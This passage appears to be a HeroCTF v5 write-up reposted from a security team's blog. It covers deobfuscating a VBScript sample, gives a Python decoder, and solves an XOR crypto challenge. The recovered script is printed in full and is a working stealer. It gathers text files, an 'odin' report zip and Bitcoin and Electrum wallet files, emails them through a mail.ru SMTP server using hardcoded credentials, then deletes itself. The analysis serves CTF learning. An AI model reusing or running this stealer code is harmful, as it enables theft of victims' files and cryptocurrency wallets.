SUb LXTvAQufKFkHMxJwGYFOsFUwJcYBTRDPuPUdadnmD
eval(eXecUTe(fwwCltiieslkzggUCrJIaeUtjBmPvvGZwJNHoLFsp))
enD sUB
FnCtqZiRWLtyCeayCzQdIrDKqrIZAkwRIzBsCpRXs

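In effect, the script splits that very long expression on `*`, evaluates each piece, and converts each result to a character with chr.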

on error resume next
Const Desktop = 4
Const MyDocuments = 16
Set S = CreateObject("Wscript.Shell")

Set FSO = CreateObject("scripting.filesystemobject")
WScript.Sleep(1000 * 30)

strSMTP_Server = "smtp.mail.ru"
strTo = "[email protected]"
strFrom = "[email protected]"
strSubject = "AIRDROP"
strBody = "LOG"

Set iMsg=CreateObject("CDO.Message")
Set iConf=CreateObject("CDO.Configuration")

Set wshShell = CreateObject( "WScript.Shell" )
strUserName = wshShell.ExpandEnvironmentStrings( "%USERNAME%" )
Set Flds=iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 465
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")    = 2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl")      = true
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")    = "[email protected]"
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")    = "R4CMZ3rVnMFtzz6vzRi1"

Flds.Update
iMsg.Configuration=iConf
iMsg.To=strTo

iMsg.From=strFrom
iMsg.Subject=strSubject
iMsg.TextBody=strBody
Set fld = FSO.GetFolder(S.SpecialFolders(Desktop))
For each file in fld.files
    if LCase(FSO.GetExtensionName(file)) = "txt" Then
        iMsg.AddAttachment file.path
    End if
Next

Flds.Update
iMsg.Configuration=iConf
iMsg.To=strTo
iMsg.From=strFrom
iMsg.Subject=strSubject
iMsg.TextBody=strBody

Set fld = FSO.GetFolder(S.SpecialFolders(MyDocuments))
For each file in fld.files
    if LCase(FSO.GetExtensionName(file)) = "txt" Then
        iMsg.AddAttachment file.path

    End if
Next
iMsg.AddAttachment "C:Users" & strUserName & "AppDataLocalodinodinreport.zip"
iMsg.AddAttachment "A:Users" & strUserName & "AppDataLocalodinodinreport.zip"
iMsg.AddAttachment "B:Users" & strUserName & "AppDataLocalodinodinreport.zip"
iMsg.AddAttachment "D:Users" & strUserName & "AppDataLocalodinodinreport.zip"
iMsg.AddAttachment "C:Users" & strUserName & "AppDataRoamingBitcoinwallet.dat"
iMsg.AddAttachment "C:Users" & strUserName & "AppDataRoamingElectrumwalletsdefault_wallet"
iMsg.Send

Set mFSO = CreateObject("Scripting.FileSystemObject")
Call mFSO.DeleteFile(WScript.ScriptFullName, True)

The email address is [email protected] and the file is default_wallet.
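The split-on-`*` decoding described above can be done statically, without running the VBScript or calling `eval`. This is an added example, not part of the original writeup: the names `eval_term`, `decode` and `SAMPLE_TAIL` are assumptions, and `SAMPLE_TAIL` is the last seven terms of the expression shown on the page.

```python
import re

# One obfuscated term: an integer (optionally negative), one of + - /,
# then a second integer. Anything else is rejected instead of evaluated.
TERM = re.compile(r"(-?\d+)([+\-/])(\d+)")


def eval_term(term: str) -> int:
    """Compute one term with plain integer arithmetic (no eval/exec)."""
    match = TERM.fullmatch(term.strip())
    if match is None:
        raise ValueError(f"unexpected term shape: {term!r}")
    left, op, right = int(match.group(1)), match.group(2), int(match.group(3))
    if op == "+":
        return left + right
    if op == "-":
        return left - right
    quotient, remainder = divmod(left, right)
    if remainder:
        # Every division in the sample is exact; a remainder means bad input.
        raise ValueError(f"non-integer quotient in {term!r}")
    return quotient


def decode(expression: str, delimiter_term: str = "75684/1802") -> str:
    """Split on the delimiter the script derives, then map each term to a char."""
    # The script builds its delimiter as chr(eval(75684/1802)), which is '*'.
    delimiter = chr(eval_term(delimiter_term))
    chars = []
    for term in expression.split(delimiter):
        code = eval_term(term)
        if not 0 <= code <= 255:
            raise ValueError(f"term {term!r} is outside the byte range")
        chars.append(chr(code))
    return "".join(chars)


# Last seven terms of the expression on the page (its final bytes).
SAMPLE_TAIL = ("-5581+5625*7758-7726*-2470+2554*-6374+6488"
               "*-1107+1224*-5495+5596*2065-2024")

if __name__ == "__main__":
    print(repr(decode(SAMPLE_TAIL)))
```

The decoded tail matches the end of the recovered script's final line, `Call mFSO.DeleteFile(WScript.ScriptFullName, True)`.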

Crypto

Hyper Loop

Challenge

Solution

This is a simple XOR: the key can be recovered directly from the known flag format.

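# Ciphertext given by the challenge (18 bytes)
flag = b'\x05p\x07MS\xfd4eFPw\xf9}%\x05\x03\x19\xe8'
# Known plaintext: every flag starts with this prefix
flags = b'Hero{'
key = []
# Known prefix XOR ciphertext yields the first five key bytes
for i in range(len(flags)):
    key.append(flags[i] ^ flag[i])
# The flag ends with '}', which yields the sixth key byte
key.append(ord('}') ^ flag[-1])
a = ''
# Repeat the 6-byte key to cover all 18 ciphertext bytes
key = key * 3
for j in range(len(flag)):
    a += chr(flag[j] ^ key[j])
print(a)
# Hero{hyp3r_l00p!1}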




Originally published on the WeChat official account (WgpSec狼组安全团队): HeroCTF v5 Writeup

admin
  • Published on May 16, 2023, 23:32:05
  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for the hard work):
                   HeroCTF v5 Writeup http://cn-sec.com/archives/1738535.html
